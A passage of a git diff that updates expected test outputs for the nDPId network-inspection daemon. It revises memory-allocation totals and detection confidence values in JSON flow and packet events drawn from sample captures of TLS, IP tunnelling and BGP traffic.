{"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581109359601,"flow_last_seen":1581109359683,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1673,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1581109359683,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"f9fcb52580329fb6a9b61d7542087b90","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01143{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581109359601,"flow_last_seen":1581109359683,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3113,"flow_avg_l4_payload_len":444,"midstream":0,"thread_ts_msec":1581109359683,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"f9fcb52580329fb6a9b61d7542087b90","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1581109359601,"flow_last_seen":1581109360696,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":17203,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1581109360696,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":41,"source":"443-safari.pcap","alias":"nDPId-test","packets-captured":41,"packets-processed":41,"total-skipped-flows":0,"total-l4-payload-len":17203,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1581109360696} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 41/41 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5875578 bytes -~~ total memory freed........: 5875578 bytes -~~ total allocations/frees...: 118161/118161 +~~ total memory allocated....: 6009212 bytes +~~ total memory freed........: 6009212 bytes +~~ total allocations/frees...: 120923/120923 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 1148 chars diff --git a/test/results/4in4tunnel.pcap.out b/test/results/4in4tunnel.pcap.out index 626cd3475..887a3a5ff 100644 --- a/test/results/4in4tunnel.pcap.out +++ b/test/results/4in4tunnel.pcap.out @@ -23,9 +23,9 @@ ~~ total active/idle flows...: 0/0 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5868383 bytes -~~ total memory freed........: 5868383 bytes -~~ total allocations/frees...: 118110/118110 +~~ total memory allocated....: 6002017 bytes +~~ total memory freed........: 6002017 bytes +~~ total allocations/frees...: 120872/120872 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 192 chars ~~ json string max len.......: 558 chars diff --git a/test/results/4in6tunnel.pcap.out b/test/results/4in6tunnel.pcap.out index fb4640c01..667fb53cd 100644 --- a/test/results/4in6tunnel.pcap.out +++ b/test/results/4in6tunnel.pcap.out @@ -2,10 +2,10 @@ 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"4in6tunnel.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1543235434019} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"4in6tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1543235434019,"flow_last_seen":1543235434019,"flow_idle_time":620000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1543235434019,"l3_proto":"ip6","src_ip":"22e0:1685:eda7:38cc:58bd:f3f1:aa3f:22d8","dst_ip":"344a:ba94:152a:ac34::2a","l4_proto":4,"flow_datalink":1,"flow_max_packets":3} 00593{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"4in6tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1543235434019,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":154,"pkt_l4_len":52,"thread_ts_msec":1543235434019,"pkt":"AAECunaOAAAASfSHht1gAAAAADQEPyLgFoXtpzjMWL3z8ao\/Itg0SrqUFSqsNAAAAAAAAAAqRQAANHvwQAB\/BqsfwKgAAQoKCgH7xwG73+E+ggAAAACAAv\/\/fqUAAAIEBYQBAwMIAQEEAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"4in6tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1543235434019,"flow_last_seen":1543235434019,"flow_idle_time":620000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1543235434019,"l3_proto":"ip6","src_ip":"22e0:1685:eda7:38cc:58bd:f3f1:aa3f:22d8","dst_ip":"344a:ba94:152a:ac34::2a","l4_proto":4,"ndpi": {"confidence": {"4":"DPI"},"proto":"IP_in_IP","breed":"Acceptable","category":"Network"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"4in6tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1543235434019,"flow_last_seen":1543235434019,"flow_idle_time":620000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1543235434019,"l3_proto":"ip6","src_ip":"22e0:1685:eda7:38cc:58bd:f3f1:aa3f:22d8","dst_ip":"344a:ba94:152a:ac34::2a","l4_proto":4,"ndpi": {"confidence": {"6":"DPI"},"proto":"IP_in_IP","breed":"Acceptable","category":"Network"}} 00594{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"4in6tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1543235434019,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":154,"pkt_l4_len":52,"thread_ts_msec":1543235434019,"pkt":"AAECunaOAAAASfSHht1gAAAAADQEPTRKupQVKqw0AAAAAAAAACoi4BaF7ac4zFi98\/GqPyLYRQAANEufQABhBvlwCgoKAcCoAAEBu\/vHAwzKjt\/hPoOAEv\/\/sQUAAAIEBXgBAwMIAQEEAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00874{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"4in6tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1543235434019,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":366,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":366,"pkt_l4_len":264,"thread_ts_msec":1543235434019,"pkt":"AAECunaOAAAASfSHht1gAAAAAQgEPyLgFoXtpzjMWL3z8ao\/Itg0SrqUFSqsNAAAAAAAAAAqRQABCHv3QAB\/BqpEwKgAAQoKCgH7xwG73+E+gwMMyo9QGAQA0icAABYDAwDbAQAA1wMDW5uXE0\/QFYUpkWO+HpgF5MI5wT9TQj14SroSH1Zl8oggjz8AALXLO9H2rxfCGsjqy7cU6\/NXDrPxEswgEUGVcfAAJsAswCvAMMAvwCTAI8AowCfACsAJwBTAEwCdAJwAPQA8ADUALwAKAQAAaAAAABEADwAADHd3dy5iaW5nLmNvbQAKAAgABgAdABcAGAALAAIBAAANABQAEgQBBQECAQQDBQMCAwICBgEGAwAjAAAAEAAOAAwCaDIIaHR0cC8xLjEAFwAAABgABgAKAwIBAP8BAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"4in6tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1543235434019,"flow_last_seen":1543235434019,"flow_idle_time":620000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":1780,"flow_avg_l4_payload_len":445,"midstream":0,"thread_ts_msec":1543235434019,"l3_proto":"ip6","src_ip":"22e0:1685:eda7:38cc:58bd:f3f1:aa3f:22d8","dst_ip":"344a:ba94:152a:ac34::2a","l4_proto":4,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IP_in_IP","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"4in6tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1543235434019,"flow_last_seen":1543235434019,"flow_idle_time":620000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":1780,"flow_avg_l4_payload_len":445,"midstream":0,"thread_ts_msec":1543235434019,"l3_proto":"ip6","src_ip":"22e0:1685:eda7:38cc:58bd:f3f1:aa3f:22d8","dst_ip":"344a:ba94:152a:ac34::2a","l4_proto":4,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IP_in_IP","breed":"Acceptable","category":"Network"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"4in6tunnel.pcap","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":1780,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1543235434019} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4/4 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869559 bytes -~~ total memory freed........: 5869559 bytes -~~ total allocations/frees...: 118118/118118 +~~ total memory allocated....: 6003193 bytes +~~ total memory freed........: 6003193 bytes +~~ total allocations/frees...: 120880/120880 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 879 chars diff --git a/test/results/6in4tunnel.pcap.out b/test/results/6in4tunnel.pcap.out index ef2772842..08d6fc141 100644 --- a/test/results/6in4tunnel.pcap.out +++ b/test/results/6in4tunnel.pcap.out @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5873126 bytes -~~ total memory freed........: 5873126 bytes -~~ total allocations/frees...: 118241/118241 +~~ total memory allocated....: 6006760 bytes +~~ total memory freed........: 6006760 bytes +~~ total allocations/frees...: 121003/121003 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 657 chars diff --git a/test/results/6in6tunnel.pcap.out b/test/results/6in6tunnel.pcap.out index 9a8c9c8a9..f93f867ad 100644 --- a/test/results/6in6tunnel.pcap.out +++ b/test/results/6in6tunnel.pcap.out @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870561 bytes -~~ total memory freed........: 5870561 bytes -~~ total allocations/frees...: 118120/118120 +~~ total memory allocated....: 6004195 bytes +~~ total memory freed........: 6004195 bytes +~~ total allocations/frees...: 120882/120882 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 604 chars diff --git a/test/results/BGP_Cisco_hdlc_slarp.pcap.out b/test/results/BGP_Cisco_hdlc_slarp.pcap.out index e6c8668c5..2c671b7e4 100644 --- a/test/results/BGP_Cisco_hdlc_slarp.pcap.out +++ b/test/results/BGP_Cisco_hdlc_slarp.pcap.out @@ -4,8 +4,8 @@ 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1445156939131,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":48,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":48,"pkt_l4_len":24,"thread_ts_msec":1445156939131,"pkt":"DwAIAEXAACz4kkAAAQa2VmQQAQJkEAEBR5QAs7zqddEAAAAAYAJAABMAAAACBAW0"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1445156939145,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":48,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":48,"pkt_l4_len":24,"thread_ts_msec":1445156939145,"pkt":"DwAIAEXAACyvfwAAAQY\/amQQAQFkEAECALNHlBlZ03+86nXSYBJAACYWAAACBAW0"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1445156939152,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":44,"pkt_l4_len":20,"thread_ts_msec":1445156939152,"pkt":"DwAIAEXAACj4k0AAAQa2WWQQAQJkEAEBR5QAs7zqddIZWdOAUBBAAD3TAAA="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1445156939131,"flow_last_seen":1445156939152,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1445156939152,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":14,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1445156939131,"flow_last_seen":1445156989230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1445156989230,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","flow_datalink":9,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1445156939131,"flow_last_seen":1445156939152,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1445156939152,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":14,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1445156939131,"flow_last_seen":1445156989230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1445156989230,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","flow_datalink":9,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} 00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":14,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","packets-captured":14,"packets-processed":14,"total-skipped-flows":0,"total-l4-payload-len":345,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1445156989230} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 14/14 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869849 bytes -~~ total memory freed........: 5869849 bytes -~~ total allocations/frees...: 118128/118128 +~~ total memory allocated....: 6003483 bytes +~~ total memory freed........: 6003483 bytes +~~ total allocations/frees...: 120890/120890 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 453 chars ~~ json string max len.......: 692 chars diff --git a/test/results/BGP_redist.pcap.out b/test/results/BGP_redist.pcap.out index 128b8944b..59924adc0 100644 --- a/test/results/BGP_redist.pcap.out +++ b/test/results/BGP_redist.pcap.out @@ -4,8 +4,8 @@ 00503{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"BGP_redist.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":163,"pkt_type":34887,"pkt_l3_offset":4,"pkt_l4_offset":0,"pkt_len":163,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"DwCIRwABLf5FwACbk8xAAP8G2sQCAgICBAQEBACz+C\/VqGxJPJL2UFAYP7QOoQAA\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/wBzAgAAAFxAAQECQAIAgAQEAAAAVkAFBAAAAGTAECAAAgBkAAAEVwAFAAAAAQIAgAAAAAAAAwCAAawQAgEAAIAOIQABgAwAAAAAAAAAAAICAgIAeAABkQAAAGQAAABkqgAAAA=="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7580000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","flow_datalink":104,"flow_max_packets":3} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1256636836167,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":159,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":159,"pkt_l4_len":135,"thread_ts_msec":1256636836167,"pkt":"DwAIAEXAAJv\/w0AA\/gZtywICAgIFBQUFALPBGWeqNFC\/WbBkUBg\/x6y+AAD\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/AHMCAAAAXEABAQJAAgCABAQAAABWQAUEAAAAZMAQIAACAGQAAARXAAUAAAABAgCAAAAAAAADAIABrBACAQAAgA4hAAGADAAAAAAAAAAAAgICAgB4AAGRAAAAZAAAAGSqAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7580000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7580000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","flow_datalink":104,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7580000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7580000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","flow_datalink":104,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":115,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1256636836167} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2/1 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869472 bytes -~~ total memory freed........: 5869472 bytes -~~ total allocations/frees...: 118115/118115 +~~ total memory allocated....: 6003106 bytes +~~ total memory freed........: 6003106 bytes +~~ total allocations/frees...: 120877/120877 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 192 chars ~~ json string max len.......: 679 chars diff --git a/test/results/EAQ.pcap.out b/test/results/EAQ.pcap.out index c4c9ef68c..0356053fe 100644 --- a/test/results/EAQ.pcap.out +++ b/test/results/EAQ.pcap.out @@ -4,12 +4,12 @@ 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1432820948562,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820948562,"pkt":"ABoRAAACABoRAAABCABFAAA8xb9AAEAGRgEKCAABrcJ3MND5AFA4ezYlAAAAAKACOQisdgAAAgQFtAQCCAoABPOaAAAAAAEDAwQ="} 